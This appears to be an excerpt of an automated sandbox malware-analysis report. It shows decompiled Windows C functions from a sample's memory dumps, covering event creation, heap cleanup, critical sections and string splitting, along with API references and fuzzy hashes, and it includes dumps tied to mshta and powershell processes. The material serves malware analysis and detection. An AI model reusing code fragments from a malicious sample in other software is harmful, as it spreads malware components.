                            • Opcode ID: 5c1ae4a1ae3d9b904efd1506697acd29396a5ebbb78de809c3e93e2a15cdbafb
                            • Instruction ID: eaf6d749dee0eaf5b23d5576738c373c5c1df5f8eb110bf80a2d4baaaada21fc
                            • Opcode Fuzzy Hash: 5c1ae4a1ae3d9b904efd1506697acd29396a5ebbb78de809c3e93e2a15cdbafb
                            • Instruction Fuzzy Hash: A7110272E04254AFC7108BAADC88D9ABBEBEB80361B08017BF505D7350E7719E40C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D7571(void* __esi) {
                            				struct _SECURITY_ATTRIBUTES* _v4;
                            				void* _t8;
                            				void* _t10;
                            
                            				_v4 = 0;
                            				memset(__esi, 0, 0x38);
                            				_t8 = CreateEventA(0, 1, 0, 0);
                            				 *(__esi + 0x1c) = _t8;
                            				if(_t8 != 0) {
                            					_t10 = CreateEventA(0, 1, 1, 0);
                            					 *(__esi + 0x20) = _t10;
                            					if(_t10 == 0) {
                            						CloseHandle( *(__esi + 0x1c));
                            					} else {
                            						_v4 = 1;
                            					}
                            				}
                            				return _v4;
                            			}

                            APIs
                            • memset.NTDLL ref: 006D757F
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 006D7594
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D75A1
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D75B3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 0ec2914526a29ae329eac8b68958c395154fa8240d67a6abd2f8c576e1847188
                            • Instruction ID: 78e10f509541e1351bbb9102b7ce515e5841113ecf8fb260f53ccf4d4728eaa4
                            • Opcode Fuzzy Hash: 0ec2914526a29ae329eac8b68958c395154fa8240d67a6abd2f8c576e1847188
                            • Instruction Fuzzy Hash: 09F05EB5905308BFD3106F62ECC4C67BBADEB46298B11492FF54682211DB71A9098AB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D75C2() {
                            				void* _t1;
                            				intOrPtr _t5;
                            				void* _t6;
                            				void* _t7;
                            				void* _t11;
                            
                            				_t1 =  *0x6da30c; // 0x18c
                            				if(_t1 == 0) {
                            					L8:
                            					return 0;
                            				}
                            				SetEvent(_t1);
                            				_t11 = 0x7fffffff;
                            				while(1) {
                            					SleepEx(0x64, 1);
                            					_t5 =  *0x6da35c; // 0x0
                            					if(_t5 == 0) {
                            						break;
                            					}
                            					_t11 = _t11 - 0x64;
                            					if(_t11 > 0) {
                            						continue;
                            					}
                            					break;
                            				}
                            				_t6 =  *0x6da30c; // 0x18c
                            				if(_t6 != 0) {
                            					CloseHandle(_t6);
                            				}
                            				_t7 =  *0x6da2d8; // 0x10b0000
                            				if(_t7 != 0) {
                            					HeapDestroy(_t7);
                            				}
                            				goto L8;
                            			}

                            APIs
                            • SetEvent.KERNEL32(0000018C,00000001,006D394C), ref: 006D75CD
                            • SleepEx.KERNEL32(00000064,00000001), ref: 006D75DC
                            • CloseHandle.KERNEL32(0000018C), ref: 006D75FD
                            • HeapDestroy.KERNEL32(010B0000), ref: 006D760D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: a63469d6fd7bb0af451836797375907ad6b95a17f897a602858007453d9c5f4c
                            • Instruction ID: 7686bfea48a9a84d94f58d13e2d24dd8f2c2ab3599d4cfe16e159584c37dca55
                            • Opcode Fuzzy Hash: a63469d6fd7bb0af451836797375907ad6b95a17f897a602858007453d9c5f4c
                            • Instruction Fuzzy Hash: 90F01C71E0A61197DB205B7AFC48B9637DBAB04B61B091516BC01E23E1EB30D940C666
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E006D731D() {
                            				void* _v0;
                            				void** _t3;
                            				void** _t5;
                            				void** _t7;
                            				void** _t8;
                            				void* _t10;
                            
                            				_t3 =  *0x6da3cc; // 0x14a9600
                            				__imp__( &(_t3[0x10]));
                            				while(1) {
                            					_t5 =  *0x6da3cc; // 0x14a9600
                            					_t1 =  &(_t5[0x16]); // 0x0
                            					if( *_t1 == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t7 =  *0x6da3cc; // 0x14a9600
                            				_t10 =  *_t7;
                            				if(_t10 != 0 && _t10 != 0x6db827) {
                            					HeapFree( *0x6da2d8, 0, _t10);
                            					_t7 =  *0x6da3cc; // 0x14a9600
                            				}
                            				 *_t7 = _v0;
                            				_t8 =  &(_t7[0x10]);
                            				__imp__(_t8);
                            				return _t8;
                            			}

                            APIs
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D7326
                            • Sleep.KERNEL32(0000000A), ref: 006D7330
                            • HeapFree.KERNEL32(00000000), ref: 006D735E
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D7373
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 57d332855a64bdb81009a4cd25ee5d09091b7d279e3ca6f8de7c91f809cacac5
                            • Instruction ID: 2c2336e9d4a325af72d127ebe6451b20ae5225477e889348e7f603a8c71b2b8a
                            • Opcode Fuzzy Hash: 57d332855a64bdb81009a4cd25ee5d09091b7d279e3ca6f8de7c91f809cacac5
                            • Instruction Fuzzy Hash: 17F0FE74E0A201DFE7289F99EC59E5937B7AB84300B06601FE902D73B0D730AC00EA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E006D452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                            				intOrPtr* _v8;
                            				void* _t17;
                            				intOrPtr* _t22;
                            				void* _t27;
                            				char* _t30;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t37;
                            				void* _t39;
                            				int _t42;
                            
                            				_t17 = __eax;
                            				_t37 = 0;
                            				__imp__(_a4, _t33, _t36, _t27, __ecx);
                            				_t2 = _t17 + 1; // 0x1
                            				_t28 = _t2;
                            				_t34 = E006D7A71(_t2);
                            				if(_t34 != 0) {
                            					_t30 = E006D7A71(_t28);
                            					if(_t30 == 0) {
                            						E006D789E(_t34);
                            					} else {
                            						_t39 = _a4;
                            						_t22 = E006D7ABF(_t39);
                            						_v8 = _t22;
                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                            							_a4 = _t39;
                            						} else {
                            							_t26 = _t22 + 2;
                            							_a4 = _t22 + 2;
                            							_t22 = E006D7ABF(_t26);
                            							_v8 = _t22;
                            						}
                            						if(_t22 == 0) {
                            							__imp__(_t34, _a4);
                            							 *_t30 = 0x2f;
                            							 *((char*)(_t30 + 1)) = 0;
                            						} else {
                            							_t42 = _t22 - _a4;
                            							memcpy(_t34, _a4, _t42);
                            							 *((char*)(_t34 + _t42)) = 0;
                            							__imp__(_t30, _v8);
                            						}
                            						 *_a8 = _t34;
                            						_t37 = 1;
                            						 *_a12 = _t30;
                            					}
                            				}
                            				return _t37;
                            			}

                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0), ref: 006D453A
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                              • Part of subcall function 006D7ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,006D4568,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102), ref: 006D7ACD
                              • Part of subcall function 006D7ABF: StrChrA.SHLWAPI(?,0000003F,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D7AD7
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?), ref: 006D4598
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D45A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D45B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: e6cb650a354e76ee0d0f76a61afb4a3e50f3ba4b775001102c8c3b00b616edf2
                            • Instruction ID: 30ae1114eb186743208affa78ac86635a7735c3281f3c67d6d0c2bc93fe5f8f5
                            • Opcode Fuzzy Hash: e6cb650a354e76ee0d0f76a61afb4a3e50f3ba4b775001102c8c3b00b616edf2
                            • Instruction Fuzzy Hash: 65219072D04255ABCB125F74EC44AAE7FAAAF45390B18805AF9059B311EF31DE0197A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                            • lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                            • lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 56e1afe536800edabc182791dcc3a10a5b6ce3ba51517b924389f8eb74337b1e
                            • Instruction ID: 4f674cdd5b929f612fec73b5bf06decf375c93a7582660be890795ddf5bd3cf6
                            • Opcode Fuzzy Hash: 56e1afe536800edabc182791dcc3a10a5b6ce3ba51517b924389f8eb74337b1e
                            • Instruction Fuzzy Hash: 87E06D33D02620A787116BA8AC48C6BBBAEEE89750309041BF600D3220C72198018BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000E.00000003.495947797.000001C8C6290000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C8C6290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_3_1c8c6290000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: ea3a5573564c81a2ca98bf6e8495dfbf72caba294b994b10a782e199ffa766ee
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: 3B9002154D540A95E41411910C856DC904067C8258FD44498481690144DD4E5396516A
                            Uniqueness

                            Uniqueness Score: -1.00%


                            Memory Dump Source
                            • Source File: 0000000F.00000002.529875626.00007FFBAE760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAE760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_7ffbae760000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                            • Instruction ID: 4274224c881642fdbf1b05481568b36a9ef83a7ceaed92ab08428647454dfe75
                            • Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                            • Instruction Fuzzy Hash: BF01677111CB0C4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45
                            Uniqueness

                            Uniqueness Score: -1.00%